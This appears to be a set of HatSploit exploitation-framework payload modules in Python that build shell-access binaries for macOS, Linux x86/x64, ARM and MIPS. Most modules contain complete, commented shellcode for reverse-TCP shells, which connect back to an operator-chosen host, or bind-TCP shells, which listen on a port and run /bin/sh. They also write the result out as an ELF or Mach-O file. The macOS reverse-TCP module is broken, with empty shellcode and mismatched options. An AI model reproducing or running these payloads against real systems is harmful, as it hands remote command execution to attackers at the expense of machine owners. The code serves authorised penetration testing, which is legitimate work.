class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "macOS x64 Shell Reverse TCP", 'Module': "payload/macos/x64/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "macho", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options( self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = (b"") self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x64', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "Linux armle Shell Reverse TCP", 'Module': "payload/linux/armle/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for Linux armle.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): local_host, local_port, file_format, local_file = self.parser.parse_options( self.options) local_host = self.payload.host_to_bytes(local_host) local_port = self.payload.port_to_bytes(local_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x01\x10\x8F\xE2" + b"\x11\xFF\x2F\xE1" + b"\x02\x20\x01\x21" + b"\x92\x1A\x0F\x02" + b"\x19\x37\x01\xDF" + b"\x06\x1C\x08\xA1" + b"\x10\x22\x02\x37" + b"\x01\xDF\x3F\x27" + b"\x02\x21\x30\x1c" + b"\x01\xdf\x01\x39" + b"\xFB\xD5\x05\xA0" + b"\x92\x1a\x05\xb4" + b"\x69\x46\x0b\x27" + b"\x01\xDF\xC0\x46" + b"\x02\x00" + local_port + # "\x12\x34" struct sockaddr and port local_host + # reverse ip address b"\x2f\x62\x69\x6e" + # /bin b"\x2f\x73\x68\x00" # /sh\0 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'armle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "Linux x64 Shell Bind TCP", 'Module': "payload/linux/x64/shell_bind_tcp", 'Authors': ['enty8080'], 'Description': "Shell Bind TCP Payload for Linux x64.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options( self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x6a\x29" + # pushq $0x29 b"\x58" + # pop %rax b"\x99" + # cltd b"\x6a\x02" + # pushq $0x2 b"\x5f" + # pop %rdi b"\x6a\x01" + # pushq $0x1 b"\x5e" + # pop %rsi b"\x0f\x05" + # syscall b"\x48\x97" + # xchg %rax,%rdi b"\x52" + # push %rdx b"\xc7\x04\x24\x02\x00" + # movl $0xb3150002,(%rsp) bind_port + # port b"\x48\x89\xe6" + # mov %rsp,%rsi b"\x6a\x10" + # pushq $0x10 b"\x5a" + # pop %rdx b"\x6a\x31" + # pushq $0x31 b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x6a\x32" + # pushq $0x32 b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x48\x31\xf6" + # xor %rsi,%rsi b"\x6a\x2b" + # pushq $0x2b b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x48\x97" + # xchg %rax,%rdi b"\x6a\x03" + # pushq $0x3 b"\x5e" + # pop %rsi b"\x48\xff\xce" + # dec %rsi b"\x6a\x21" + # pushq $0x21 b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x75\xf6" + # jne 33 <dup2_loop> b"\x6a\x3b" + # pushq $0x3b b"\x58" + # pop %rax b"\x99" + # cltd b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx b"\x73\x68\x00" + # b"\x53" + # push %rbx b"\x48\x89\xe7" + # mov %rsp,%rdi b"\x52" + # push %rdx b"\x57" + # push %rdi b"\x48\x89\xe6" + # mov %rsp,%rsi b"\x0f\x05" # syscall ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x64', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "Linux mipsle Shell Bind TCP", 'Module': "payload/linux/mipsle/shell_bind_tcp", 'Authors': [ 'enty8080' ], 'Description': "Shell Bind TCP Payload for Linux mipsle.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options(self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\xe0\xff\xbd\x27" + # addiu sp,sp,-32 b"\xfd\xff\x0e\x24" + # li t6,-3 b"\x27\x20\xc0\x01" + # nor a0,t6,zero b"\x27\x28\xc0\x01" + # nor a1,t6,zero b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket ) b"\x0c\x01\x01\x01" + # syscall b"\xff\xff\x50\x30" + # andi s0,v0,0xffff b"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16) bind_port + b"\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 8888 (default LPORT)) b"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000 b"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3 b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2 b"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002 b"\xe0\xff\xad\xaf" + # sw t5,-32(sp) b"\xe4\xff\xa0\xaf" + # sw zero,-28(sp) b"\xe8\xff\xa0\xaf" + # sw zero,-24(sp) b"\xec\xff\xa0\xaf" + # sw zero,-20(sp) b"\x25\x20\x10\x02" + # or a0,s0,s0 b"\xef\xff\x0e\x24" + # li t6,-17 b"\x27\x30\xc0\x01" + # nor a2,t6,zero b"\xe0\xff\xa5\x23" + # addi a1,sp,-32 b"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A b"\x0c\x01\x01\x01" + # syscall b"\x25\x20\x10\x02" + # or a0,s0,s0 b"\x01\x01\x05\x24" + # li a1,257 b"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen ) b"\x0c\x01\x01\x01" + # syscall b"\x25\x20\x10\x02" + # or a0,s0,s0 b"\xff\xff\x05\x28" + # slti a1,zero,-1 b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept ) b"\x0c\x01\x01\x01" + # syscall b"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket b"\xfd\xff\x11\x24" + # li s1,-3 b"\x27\x88\x20\x02" + # nor s1,s1,zero b"\xff\xff\xa4\x8f" + # lw a0,-1(sp) b"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop b"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 ) b"\x0c\x01\x01\x01" + # syscall 0x40404 b"\xff\xff\x10\x24" + # li s0,-1 b"\xff\xff\x31\x22" + # addi s1,s1,-1 b"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop> b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi" b"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//" b"\xec\xff\xaf\xaf" + # sw t7,-20(sp) b"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh" b"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/" b"\xf0\xff\xae\xaf" + # sw t6,-16(sp) b"\xf4\xff\xa0\xaf" + # sw zero,-12(sp) b"\xec\xff\xa4\x27" + # addiu a0,sp,-20 b"\xf8\xff\xa4\xaf" + # sw a0,-8(sp) b"\xfc\xff\xa0\xaf" + # sw zero,-4(sp) b"\xf8\xff\xa5\x27" + # addiu a1,sp,-8 b"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve ) b"\x0c\x01\x01\x01" # syscall 0x40404 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'mipsle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "Linux mipsle Shell Reverse TCP", 'Module': "payload/linux/mipsle/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for Linux mipsle.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): local_host, local_port, file_format, local_file = self.parser.parse_options( self.options) local_host = self.payload.host_to_bytes(local_host) local_port = self.payload.port_to_bytes(local_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\xff\xff\x04\x28" + # slti a0,zero,-1 b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\x11\x11\x04\x28" + # slti a0,zero,4369 b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xfd\xff\x0c\x24" + # li t4,-3 b"\x27\x20\x80\x01" + # nor a0,t4,zero b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xfd\xff\x0c\x24" + # li t4,-3 b"\x27\x20\x80\x01" + # nor a0,t4,zero b"\x27\x28\x80\x01" + # nor a1,t4,zero b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\x57\x10\x02\x24" + # li v0,4183 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xff\xff\x44\x30" + # andi a0,v0,0xffff b"\xc9\x0f\x02\x24" + # li v0,4041 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xc9\x0f\x02\x24" + # li v0,4041 b"\x0c\x09\x09\x01" + # syscall 0x42424 local_port + b"\x05\x3c" + # "\x7a\x69" lui a1,0x697a b"\x02\x00\xa5\x34" + # ori a1,a1,0x2 b"\xf8\xff\xa5\xaf" + # sw a1,-8(sp) local_host[2:] + b"\x05\x3c" + # "\x00\x01" lui a1,0x100 local_host[:2] + b"\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f b"\xfc\xff\xa5\xaf" + # sw a1,-4(sp) b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 b"\xef\xff\x0c\x24" + # li t4,-17 b"\x27\x30\x80\x01" + # nor a2,t4,zero b"\x4a\x10\x02\x24" + # li v0,4170 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\x62\x69\x08\x3c" + # lui t0,0x6962 b"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f b"\xec\xff\xa8\xaf" + # sw t0,-20(sp) b"\x73\x68\x08\x3c" + # lui t0,0x6873 b"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e b"\xf0\xff\xa8\xaf" + # sw t0,-16(sp) b"\xff\xff\x07\x28" + # slti a3,zero,-1 b"\xf4\xff\xa7\xaf" + # sw a3,-12(sp) b"\xfc\xff\xa7\xaf" + # sw a3,-4(sp) b"\xec\xff\xa4\x23" + # addi a0,sp,-20 b"\xec\xff\xa8\x23" + # addi t0,sp,-20 b"\xf8\xff\xa8\xaf" + # sw t0,-8(sp) b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 b"\xec\xff\xbd\x27" + # addiu sp,sp,-20 b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\xab\x0f\x02\x24" + # li v0,4011 b"\x0c\x09\x09\x01" # syscall 0x42424 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'mipsle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "Linux armle Shell Bind TCP", 'Module': "payload/linux/armle/shell_bind_tcp", 'Authors': [ 'enty8080' ], 'Description': "Shell Bind TCP Payload for Linux armle.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options(self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x02\x00\xa0\xe3" + b"\x01\x10\xa0\xe3" + b"\x06\x20\xa0\xe3" + b"\x07\x00\x2d\xe9" + b"\x01\x00\xa0\xe3" + b"\x0d\x10\xa0\xe1" + b"\x66\x00\x90\xef" + b"\x0c\xd0\x8d\xe2" + b"\x00\x60\xa0\xe1" + bind_port[1:2] + b"\x10\xa0\xe3" + bind_port[0:1] + b"\x70\xa0\xe3" + b"\x01\x1c\xa0\xe1" + b"\x07\x18\x81\xe0" + b"\x02\x10\x81\xe2" + b"\x02\x20\x42\xe0" + b"\x06\x00\x2d\xe9" + b"\x0d\x10\xa0\xe1" + b"\x10\x20\xa0\xe3" + b"\x07\x00\x2d\xe9" + b"\x02\x00\xa0\xe3" + b"\x0d\x10\xa0\xe1" + b"\x66\x00\x90\xef" + b"\x14\xd0\x8d\xe2" + b"\x06\x00\xa0\xe1" + b"\x03\x00\x2d\xe9" + b"\x04\x00\xa0\xe3" + b"\x0d\x10\xa0\xe1" + b"\x66\x00\x90\xef" + b"\x08\xd0\x8d\xe2" + b"\x06\x00\xa0\xe1" + b"\x01\x10\x41\xe0" + b"\x02\x20\x42\xe0" + b"\x07\x00\x2d\xe9" + b"\x05\x00\xa0\xe3" + b"\x0d\x10\xa0\xe1" + b"\x66\x00\x90\xef" + b"\x0c\xd0\x8d\xe2" + b"\x00\x60\xa0\xe1" + b"\x02\x10\xa0\xe3" + b"\x06\x00\xa0\xe1" + b"\x3f\x00\x90\xef" + b"\x01\x10\x51\xe2" + b"\xfb\xff\xff\x5a" + b"\x04\x10\x4d\xe2" + b"\x02\x20\x42\xe0" + b"\x2f\x30\xa0\xe3" + b"\x62\x70\xa0\xe3" + b"\x07\x34\x83\xe0" + b"\x69\x70\xa0\xe3" + b"\x07\x38\x83\xe0" + b"\x6e\x70\xa0\xe3" + b"\x07\x3c\x83\xe0" + b"\x2f\x40\xa0\xe3" + b"\x73\x70\xa0\xe3" + b"\x07\x44\x84\xe0" + b"\x68\x70\xa0\xe3" + b"\x07\x48\x84\xe0" + b"\x73\x50\xa0\xe3" + b"\x68\x70\xa0\xe3" + b"\x07\x54\x85\xe0" + b"\x3e\x00\x2d\xe9" + b"\x08\x00\x8d\xe2" + b"\x00\x10\x8d\xe2" + b"\x04\x20\x8d\xe2" + b"\x0b\x00\x90\xef" ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'armle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "Linux mipsbe Shell Bind TCP", 'Module': "payload/linux/mipsbe/shell_bind_tcp", 'Authors': [ 'enty8080' ], 'Description': "Shell Bind TCP Payload for Linux mipsbe.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options(self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 b"\x27\xbd\xff\xe0" + # addiu sp,sp,-32 b"\x24\x0e\xff\xfd" + # li t6,-3 b"\x01\xc0\x20\x27" + # nor a0,t6,zero b"\x01\xc0\x28\x27" + # nor a1,t6,zero b"\x28\x06\xff\xff" + # slti a2,zero,-1 b"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket ) b"\x01\x01\x01\x0c" + # syscall # bind(3, {sa_family=AF_INET, sin_port=htons(8888), sin_addr=inet_addr("0.0.0.0")}, 16) = 0 b"\x30\x50\xff\xff" + # andi s0,v0,0xffff b"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef b"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16) b"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3 b"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2 b"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000 b"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (8888 (default LPORT)) b"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c b"\xaf\xad\xff\xe0" + # sw t5,-32(sp) b"\xaf\xa0\xff\xe4" + # sw zero,-28(sp) b"\xaf\xa0\xff\xe8" + # sw zero,-24(sp) b"\xaf\xa0\xff\xec" + # sw zero,-20(sp) b"\x02\x10\x20\x25" + # or a0,s0,s0 b"\x24\x0e\xff\xef" + # li t6,-17 b"\x01\xc0\x30\x27" + # nor a2,t6,zero b"\x23\xa5\xff\xe0" + # addi a1,sp,-32 b"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A b"\x01\x01\x01\x0c" + # syscall # listen(3, 257) = 0 b"\x02\x10\x20\x25" + # or a0,s0,s0 b"\x24\x05\x01\x01" + # li a1,257 b"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen ) b"\x01\x01\x01\x0c" + # syscall # accept(3, 0, NULL) = 4 b"\x02\x10\x20\x25" + # or a0,s0,s0 b"\x28\x05\xff\xff" + # slti a1,zero,-1 b"\x28\x06\xff\xff" + # slti a2,zero,-1 b"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept ) b"\x01\x01\x01\x0c" + # syscall # dup2(4, 2) = 2 # dup2(4, 1) = 1 # dup2(4, 0) = 0 b"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket b"\x24\x11\xff\xfd" + # li s1,-3 b"\x02\x20\x88\x27" + # nor s1,s1,zero b"\x8f\xa4\xff\xff" + # lw a0,-1(sp) b"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop b"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 ) b"\x01\x01\x01\x0c" + # syscall 0x40404 b"\x24\x10\xff\xff" + # li s0,-1 b"\x22\x31\xff\xff" + # addi s1,s1,-1 b"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop> # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0 b"\x28\x06\xff\xff" + # slti a2,zero,-1 b"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//" b"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi" b"\xaf\xaf\xff\xec" + # sw t7,-20(sp) b"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/" b"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh" b"\xaf\xae\xff\xf0" + # sw t6,-16(sp) b"\xaf\xa0\xff\xf4" + # sw zero,-12(sp) b"\x27\xa4\xff\xec" + # addiu a0,sp,-20 b"\xaf\xa4\xff\xf8" + # sw a0,-8(sp) b"\xaf\xa0\xff\xfc" + # sw zero,-4(sp) b"\x27\xa5\xff\xf8" + # addiu a1,sp,-8 b"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve ) b"\x01\x01\x01\x0c" # syscall 0x40404 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'mipsbe', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "Linux x86 Shell Bind TCP", 'Module': "payload/linux/x86/shell_bind_tcp", 'Authors': ['enty8080'], 'Description': "Shell Bind TCP Payload for Linux x86.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options( self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x31\xdb" + # xorl %ebx,%ebx b"\xf7\xe3" + # mull %ebx b"\x53" + # pushl %ebx b"\x43" + # incl %ebx b"\x53" + # pushl %ebx b"\x6a\x02" + # pushl $0x02 b"\x89\xe1" + # movl %esp,%ecx b"\xb0\x66" + # movb $0x66,%al b"\xcd\x80" + # int $0x80 b"\x5b" + # popl %ebx b"\x5e" + # popl %esi b"\x52" + # pushl %edx b"\x68\x02\x00" + bind_port + # pushl port b"\x6a\x10" + # pushl $0x10 b"\x51" + # pushl %ecx b"\x50" + # pushl %eax b"\x89\xe1" + # movl %esp,%ecx b"\x6a\x66" + # pushl $0x66 b"\x58" + # popl %eax b"\xcd\x80" + # int $0x80 b"\x89\x41\x04" + # movl %eax,0x04(%ecx) b"\xb3\x04" + # movb $0x04,%bl b"\xb0\x66" + # movb $0x66,%al b"\xcd\x80" + # int $0x80 b"\x43" + # incl %ebx b"\xb0\x66" + # movb $0x66,%al b"\xcd\x80" + # int $0x80 b"\x93" + # xchgl %eax,%ebx b"\x59" + # popl %ecx b"\x6a\x3f" + # pushl $0x3f b"\x58" + # popl %eax b"\xcd\x80" + # int $0x80 b"\x49" + # decl %ecx b"\x79\xf8" + # jns <bndsockcode+50> b"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f b"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f b"\x89\xe3" + # movl %esp,%ebx b"\x50" + # pushl %eax b"\x53" + # pushl %ebx b"\x89\xe1" + # movl %esp,%ecx b"\xb0\x0b" + # movb $0x0b,%al b"\xcd\x80" # int $0x80 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x86', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): payload = payload() details = { 'Name': "macOS x64 Shell Bind TCP", 'Module': "payload/macos/x64/shell_bind_tcp", 'Authors': ['enty8080'], 'Description': "Shell Bind TCP Payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'BPORT': { 'Description': "Bind port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "macho", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options( self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x48\x31\xff" + # xorq %rdi, %rdi b"\x40\xb7\x02" + # movb $2, %dil b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x40\xb6\x01" + # movb $1, %sil b"\x48\x31\xd2" + # xorq %rdx, %rdx b"\x48\x31\xc0" + # xorq %rax, %rax b"\xb0\x02" + # movb $2, %al b"\x48\xc1\xc8\x28" + # rorq $40, %rax b"\xb0\x61" + # movb $97, %al b"\x49\x89\xc4" + # movq %rax, %r12 b"\x0f\x05" + # syscall b"\x49\x89\xc1" + # movq %rax, %r9 b"\x48\x89\xc7" + # movq %rax, %rdi b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x56" + # pushq %rsi b"\xbe\x01\x02" + # movl port, %esi bind_port + # port b"\x83\xee\x01" + # subl $1, %esi b"\x56" + # pushq %rsi b"\x48\x89\xe6" + # movq %rsp, %rsi b"\xb2\x10" + # movb $16, %dl b"\x41\x80\xc4\x07" + # addb $7, %r12b b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" + # syscall b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x48\xff\xc6" + # incq %rsi b"\x41\x80\xc4\x02" + # addb $2, %r12b b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" + # syscall b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x41\x80\xec\x4c" + # subb $76, %r12b b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" + # syscall b"\x48\x89\xc7" + # movq %rax, %rdi b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x41\x80\xc4\x3c" + # addb $60, %r12b b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" + # syscall b"\x48\xff\xc6" + # incq %rsi b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" + # syscall b"\x48\x31\xf6" + # xorq %rsi, %rsi b"\x56" + # pushq %rsi b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # movabsq $7526411553527181103, %rdi b"\x57" + # pushq %rdi b"\x48\x89\xe7" + # movq %rsp, %rdi b"\x48\x31\xd2" + # xorq %rdx, %rdx b"\x41\x80\xec\x1f" + # subb $31, %r12b b"\x4c\x89\xe0" + # movq %r12, %rax b"\x0f\x05" # syscall ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x64', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")